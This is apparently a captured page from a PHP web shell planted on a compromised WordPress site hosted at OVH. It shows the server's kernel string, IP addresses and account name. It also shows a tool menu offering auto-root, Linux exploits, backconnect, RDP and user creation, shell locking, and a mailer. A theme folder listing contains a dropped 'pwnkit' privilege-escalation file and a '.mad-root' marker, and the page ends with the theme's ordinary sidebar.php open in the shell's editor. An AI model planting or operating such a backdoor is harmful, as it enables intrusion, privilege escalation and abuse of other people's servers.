Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.101
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
inspiro /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
927
B
-rw-r--r--
LICENSE
17.67
KB
-rw-r--r--
README.md
11.53
KB
-rw-r--r--
README_DEV.md
1.29
KB
-rw-r--r--
archive.php
1.33
KB
-rw-r--r--
comments.php
4.54
KB
-rw-r--r--
footer.php
840
B
-rw-r--r--
functions.php
4.28
KB
-rw-r--r--
header.php
1.8
KB
-rw-r--r--
index.php
1.9
KB
-rw-r--r--
page.php
1.23
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
10.64
KB
-rw-r--r--
rtl.css
480
B
-rw-r--r--
screenshot.png
620.53
KB
-rw-r--r--
search.php
1.54
KB
-rw-r--r--
searchform.php
917
B
-rw-r--r--
sidebar.php
1.23
KB
-rw-r--r--
single.php
1.58
KB
-rw-r--r--
style.css
2.07
KB
-rw-r--r--
theme.json
9.05
KB
-rw-r--r--
wpml-config.xml
297
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar.php
<?php /** * The sidebar containing the main widget area * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Inspiro * @subpackage Inspiro_Lite * @since Inspiro 1.0.0 * @version 1.0.0 */ ?> <aside id="side-nav" class="side-nav" tabindex="-1"> <div class="side-nav__scrollable-container"> <div class="side-nav__wrap"> <div class="side-nav__close-button"> <button type="button" class="navbar-toggle"> <span class="screen-reader-text"><?php esc_html_e( 'Toggle navigation', 'inspiro' ); ?></span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <?php if ( has_nav_menu( 'primary' ) ) : ?> <nav class="mobile-menu-wrapper" aria-label="<?php echo esc_attr_x( 'Mobile Menu', 'menu', 'inspiro' ); ?>" role="navigation"> <?php wp_nav_menu( array( 'menu_class' => 'nav navbar-nav', 'theme_location' => 'primary', 'container' => '', ) ); ?> </nav> <?php endif ?> <?php if ( is_active_sidebar( 'sidebar' ) ) { dynamic_sidebar( 'sidebar' ); } ?> </div> </div> </aside> <div class="side-nav-overlay"></div>
Close